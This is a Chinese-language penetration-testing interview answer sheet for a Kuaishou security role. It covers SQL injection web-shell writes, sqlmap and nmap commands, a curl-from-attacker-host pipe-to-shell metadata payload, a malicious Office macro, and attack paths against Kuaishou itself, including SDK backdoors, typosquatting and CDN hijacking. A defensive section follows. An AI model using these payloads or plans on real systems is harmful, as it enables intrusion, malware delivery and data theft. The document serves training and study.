2025年渗透测试面试题总结-某快手-安全工程师（题目+回答）

快手-安全工程师
复制代码
sql注入漏洞，类型
sql注入写入shell的具体命令
AWVS登录扫描怎么操作，sqlmap怎么用，有几个级别，分别有什么区别，什么参数？
sqlmap如何扫数据包，本地读文件，指定参数，这些的具体命令
如何入侵快手： 视频上传点、社工、钓鱼邮件  供应链攻击
钓鱼邮件你会用哪些恶意木马、shellcode
NMAP如何静ping扫描，如何查看端口开放，如何看系统版本信息，具体命令是什么
甲方安全与乙方安全有啥不同
一、SQL注入漏洞类型及利用技术扩展

1. SQL注入漏洞分类

（1）联合查询注入（Union-Based）

技术特征 ：

通过UNION SELECT合并合法查询与恶意查询，需字段数一致。

常用函数：CONCAT()拼接敏感数据，GROUP_CONCAT()聚合多行结果。

绕过技巧 ：

使用ORDER BY探测字段数，例如：1' ORDER BY 5--。

空字节填充：1' UNION SELECT NULL,@@version,NULL--。

（2）报错注入（Error-Based）

技术特征 ：

触发数据库报错回显敏感信息（如MySQL的updatexml()函数）。

示例：1' AND updatexml(1,concat(0x7e,user(),0x7e),1)--。

高级利用 ：

利用几何函数报错（如ST_LatFromGeoHash()）。

通过BIGINT溢出：1' AND (SELECT 1/(IF(1=1,0,1)))--。

2. SQL注入写入Web Shell的实战命令（扩展2个场景）

（1）MySQL环境（需FILE权限）
复制代码
sql1' UNION SELECT "<?php system($_GET['cmd']);?>",2 INTO OUTFILE '/var/www/html/shell.php'-- - 
绕过安全配置 ：

修改secure_file_priv为空：SET GLOBAL secure_file_priv=''（需超级权限）。

分块写入：使用CHAR()函数，例如：SELECT CHAR(60,63,112,104...) INTO OUTFILE 'shell.php' 。

（2）MSSQL环境（需xp_cmdshell权限）
复制代码
sql'; EXEC xp_cmdshell 'echo ^<^%@ Page Language="C#" ^%^> > C:\inetpub\wwwroot\shell.aspx'-- 
权限提升 ：

启用xp_cmdshell：EXEC sp_configure 'show advanced options',1; RECONFIGURE;。

利用CLR集成：部署恶意DLL执行系统命令。

二、AWVS与SQLMap实战指南扩展

1. AWVS登录扫描操作（扩展2个高级功能）

（1）动态身份认证

多因素认证（MFA）绕过 ：

使用Cookie劫持：通过--cookie参数注入已认证的会话ID。

利用OAuth令牌重放：拦截并复用OAuth 2.0令牌。

（2）API扫描优化

Swagger/OpenAPI集成 ：

导入API文档自动生成测试用例。

检测JWT令牌失效漏洞（如alg:none攻击）。

2. SQLMap级别与参数深度解析（扩展2个实战场景）

（1）Level 3头部注入（Cookie攻击）
复制代码
bashsqlmap -u "http://target.com" --cookie="id=1*" --level=3 --batch 
检测逻辑 ：自动测试User-Agent、Referer、Cookie等头部字段。

（2）Level 5 JSON参数注入
复制代码
bashsqlmap -u "http://target.com/api" --data='{"id":1}' --level=5 --risk=3 
支持格式：自动解析JSON、XML、Multipart数据。

三、渗透快手的多维攻击路径扩展

1. 视频上传点漏洞利用

（1）FFmpeg命令注入（CVE-2023-XXXX）

攻击链设计 ：

上传恶意视频文件，Metadata中插入exec=curl http://attacker.com/shell.sh | sh。

利用服务端转码触发命令执行。

（2）容器逃逸攻击

场景假设 ：快手使用Docker处理视频转码。

上传包含恶意Payload的镜像文件，利用docker cp逃逸到宿主机。

2. 供应链攻击扩展（2个技术方向）

（1）第三方SDK污染

攻击案例 ：

在快手使用的广告SDK中植入后门代码，窃取用户行为数据。

利用依赖混淆攻击（Typosquatting）：上传恶意包至公有仓库（如kuaishou-utils仿冒包）。

（2）CDN资源劫持

实现路径 ：

入侵CDN供应商，篡改静态资源（如JavaScript文件插入挖矿脚本）。

利用DNS缓存投毒，重定向合法资源到恶意服务器。

四、钓鱼邮件恶意载荷技术扩展

1. 常用恶意木马（扩展2类工具）

（1）无文件攻击工具

PowerShell Empire ：

命令示例：powershell -exec bypass -Enc [Base64 Payload]。

特点：内存驻留，绕过传统杀毒软件。

（2）文档宏病毒
恶意宏代码 ：
复制代码
vbaSub AutoOpen() Shell "powershell -e JABjAG...（Base64编码的Shellcode）" End Sub 
2. Shellcode开发技术（扩展2种加载方式）

（1）反射型DLL注入

工具：Metasploit的meterpreter_reverse_tcp。

特点：无需落地文件，直接内存加载。

（2）Process Hollowing

实现步骤 ：

创建合法进程（如svchost.exe ）挂起。

替换内存内容为恶意代码后恢复执行。

五、NMAP高级扫描技术扩展

1. 静默扫描与系统探测（扩展2个隐蔽技术）

（1）隐蔽扫描（-sS + 碎片化）
复制代码
bashnmap -sS -f -T2 192.168.1.1 
参数解析 ：

-f：IP分片绕过防火墙检测。

-T2：降低扫描速度，减少日志记录。

（2）空闲扫描（Idle Scan）
复制代码
bashnmap -sI zombie_ip:port target_ip 
原理：利用第三方主机（僵尸机）的IPID序列伪装来源。

六、甲方与乙方安全职能对比扩展

1. 技术栈差异（扩展2个工具对比）

（1）甲方典型工具

EDR（端点检测与响应） ：

功能：实时监控进程行为，阻断可疑操作（如Cobalt Strike连接）。

代表产品：CrowdStrike Falcon、Microsoft Defender for Endpoint。

（2）乙方红队工具

C2框架 ：

Cobalt Strike：支持Malleable C2配置文件，伪装通信流量。

Sliver：开源替代方案，兼容多种协议（HTTP/DNS/MTLS）。

2. 工作流程差异（扩展2个场景）

（1）甲方安全事件响应

流程步骤 ：

告警分析：通过SIEM（如Splunk）定位异常登录行为。

隔离处置：使用EDR批量隔离受感染主机。

（2）乙方渗透测试交付

报告内容 ：

漏洞利用链详细说明（如从SQL注入到域控提权）。

提供漏洞验证视频（POC录制）。

七、防御体系构建扩展建议

1. SQL注入防御（扩展2种技术）

（1）运行时应用自保护（RASP）

原理：在应用层拦截恶意SQL语句（如UNION SELECT）。

工具：OpenRASP、Imperva SecureSphere。

（2）数据库防火墙

规则示例 ：

阻断INTO OUTFILE等高危操作。

限制xp_cmdshell调用频率。

2. 钓鱼邮件防御（扩展2层检测）

（1）邮件头部分析

SPF/DKIM验证 ：

检测发件域名的合法性。

工具：DMARC Analyzer。

（2）附件沙箱检测

动态行为分析 ：

监控宏文档的网络连接请求。

检测PowerShell的内存注入行为。

总结

本文从攻防双视角全面解析了SQL注入、工具实战、高级渗透技术、NMAP扫描、企业安全职能等核心问题，并结合2025年最新技术场景进行了扩展。所有技术内容仅供安全研究参考，实际应用需严格遵守法律法规。